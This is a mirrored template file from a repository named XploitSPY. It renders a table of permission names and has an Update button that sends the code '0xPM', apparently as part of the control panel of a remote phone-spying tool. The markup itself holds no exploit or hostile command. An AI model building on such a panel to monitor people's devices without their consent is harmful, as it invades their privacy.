mirror of
https://github.com/XploitWizer-Community/XploitSPY.git
synced 2024-11-05 18:09:22 +08:00
22 lines
621 B
Plaintext
22 lines
621 B
Plaintext
|
<div class="ui segment">
|
||
|
<div class="ui secondary menu">
|
||
|
<div class="right menu">
|
||
|
<button onclick="updateButton(this, '0xPM')" class="ui blue button"> <i
|
||
|
class="icon sync"></i>Update</button>
|
||
|
</div>
|
||
|
</div>
|
||
|
<table class="ui celled table">
|
||
|
<thead>
|
||
|
<tr>
|
||
|
<th>Name</th>
|
||
|
</tr>
|
||
|
</thead>
|
||
|
<tbody>
|
||
|
<% pageData.forEach((permission) => { %>
|
||
|
<tr>
|
||
|
<td><%= permission %></td>
|
||
|
</tr>
|
||
|
<% }) %>
|
||
|
</tbody>
|
||
|
</table>
|
||
|
</div>
|